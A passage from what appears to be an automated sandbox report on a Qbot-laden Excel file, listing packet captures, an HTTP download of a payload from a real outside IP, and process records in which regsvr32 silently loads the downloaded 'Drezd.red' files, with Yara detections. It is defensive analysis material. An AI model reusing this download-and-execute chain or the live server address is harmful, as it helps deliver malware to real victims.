                          File Type:data
                          Stream Size:256
                          Entropy:1.80540314317
                          Base64 Encoded:False
                          Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 1047
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/dir
                          File Type:data
                          Stream Size:1047
                          Entropy:6.66117755603
                          Base64 Encoded:True

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 28, 2021 13:16:17.664313078 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.664346933 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.666522980 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.816703081 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.816869020 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870121002 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870148897 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870172024 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870369911 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870430946 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870451927 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870475054 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870493889 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870512009 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870536089 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870558977 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870580912 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:17.870671034 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870697021 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870701075 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870722055 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870724916 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.870727062 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:17.871793032 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.005440950 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.005656958 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.076637030 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076667070 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076692104 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076714993 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076739073 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076761007 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076786995 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076833963 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076858997 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076880932 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076900959 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076925039 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.076931000 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.076982021 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.076992989 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.077001095 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.077006102 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.078649044 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.192809105 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.193048954 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.283693075 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283730984 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283749104 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283767939 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283792019 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283811092 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283828974 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283852100 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283875942 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283900023 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283926010 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283931971 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.283951044 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.283972979 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.283979893 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.283984900 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.286262989 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.380819082 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.381134033 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490556002 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490598917 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490617037 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490639925 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490658998 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490681887 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490700960 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490724087 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490767002 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490787029 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490808010 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490816116 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490832090 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490854979 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490855932 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490865946 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490874052 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490900040 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490936041 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490945101 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.490963936 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.490982056 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491002083 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491019964 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491039038 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491061926 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491086006 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491106987 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491111040 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.491146088 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.491147995 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.491168022 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.491220951 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.492825031 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.569468975 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.569720984 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.697122097 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697144985 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697156906 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697170019 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697204113 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697227955 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697247028 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697262049 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697278976 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697292089 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697304964 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697318077 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.697418928 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.701353073 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.701426983 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.756967068 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.757082939 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904599905 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904629946 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904653072 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904675961 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904676914 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904699087 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904709101 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904715061 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904720068 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904743910 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904768944 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904787064 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904791117 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904802084 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904808044 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904819012 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904823065 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904844999 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904867887 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904871941 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904886007 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904891968 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.904917002 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.904933929 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.906757116 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:18.944396973 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:18.944547892 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.112941027 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.112977982 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113003016 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113023043 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113044024 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113064051 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113085032 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113111973 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113133907 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113152027 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113174915 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113178015 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113198042 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113221884 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113245010 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113255978 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113265991 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113287926 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113306999 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113316059 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113332033 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113353014 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113358021 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113370895 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113392115 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113399029 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113413095 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113415003 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113435030 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113442898 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113459110 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.113480091 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.113506079 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.115709066 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.134794950 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.134943008 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321058989 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321079016 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321114063 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321140051 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321163893 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321187973 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321212053 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321244001 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321245909 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321271896 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321288109 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321299076 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321299076 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321307898 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321326971 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321330070 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321343899 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321352959 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.321369886 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.321402073 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.322047949 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.322120905 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.322911978 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.527571917 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.527852058 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530524015 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530556917 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530569077 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530586958 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530603886 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530616999 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530688047 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530704021 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530706882 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530720949 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530740976 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530755997 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530757904 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530774117 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530787945 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530791044 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530806065 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530822039 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530826092 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530838966 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530854940 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530858040 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530874014 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530890942 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530893087 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530905962 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530924082 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530925035 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530941010 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530951023 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530956984 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530975103 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.530982971 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.530992985 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.531014919 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.531042099 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.532603979 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.736519098 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736579895 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736599922 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736622095 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736644030 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736666918 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736685991 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736702919 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736720085 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736737967 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736753941 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736778975 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736790895 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.736855984 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.736891031 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.739984035 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940233946 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940439939 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940665960 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940695047 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940716028 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940736055 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940742016 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940757990 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940759897 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940773964 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940783978 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940788984 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940805912 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940826893 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940826893 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940840006 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940850019 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940866947 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940872908 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940884113 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940898895 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940917015 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940933943 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940939903 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940953970 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940962076 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940977097 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.940990925 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.940992117 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941005945 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941026926 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941047907 CEST8049165190.14.37.178192.168.2.22
                          Sep 28, 2021 13:16:19.941054106 CEST4916580192.168.2.22190.14.37.178
                          Sep 28, 2021 13:16:19.941066027 CEST4916580192.168.2.22190.14.37.178

                          HTTP Request Dependency Graph

                          • 190.14.37.178

                          HTTP Packets

                          Session ID: 0
                          Source IP: 192.168.2.22
                          Source Port: 49165
                          Destination IP: 190.14.37.178
                          Destination Port: 80
                          Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

                          Timestamp: Sep 28, 2021 13:16:16.226859093 CEST
                          kBytes transferred: 0
                          Direction: OUT
                          Data:
                          GET /44467.5523376157.dat HTTP/1.1
                          Accept: */*
                          UA-CPU: AMD64
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                          Host: 190.14.37.178
                          Connection: Keep-Alive

                          Timestamp: Sep 28, 2021 13:16:17.249574900 CEST
                          kBytes transferred: 1
                          Direction: IN
                          Data:
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Tue, 28 Sep 2021 11:16:17 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 387072
                          Connection: keep-alive
                          X-Powered-By: PHP/5.4.16
                          Accept-Ranges: bytes
                          Expires: 0
                          Cache-Control: no-cache, no-store, must-revalidate
                          Content-Disposition: attachment; filename="44467.5523376157.dat"


                          System Behavior

                          General

                          Start time:13:15:18
                          Start date:28/09/2021
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                          Imagebase:0x13f650000
                          File size:28253536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:moderate

                          General

                          Start time:13:16:50
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd.red
                          Imagebase:0xff050000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:13:16:51
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\regsvr32.exe
                          Wow64 process (32bit):true
                          Commandline: -silent ..\Drezd.red
                          Imagebase:0xac0000
                          File size:14848 bytes
                          MD5 hash:432BE6CF7311062633459EEF6B242FB5
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.610943996.0000000010001000.00000040.00020000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000006.00000002.609100712.0000000000200000.00000004.00000001.sdmp, Author: Joe Security
                          Reputation:moderate

                          General

                          Start time:13:16:52
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\explorer.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Windows\SysWOW64\explorer.exe
                          Imagebase:0x1b0000
                          File size:2972672 bytes
                          MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                          Reputation:high

                          General

                          Start time:13:16:54
                          Start date:28/09/2021
                          Path:C:\Windows\System32\regsvr32.exe
                          Wow64 process (32bit):false
                          Commandline:regsvr32 -silent ..\Drezd1.red
                          Imagebase:0xff050000
                          File size:19456 bytes
                          MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high

                          General

                          Start time:13:16:54
                          Start date:28/09/2021
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
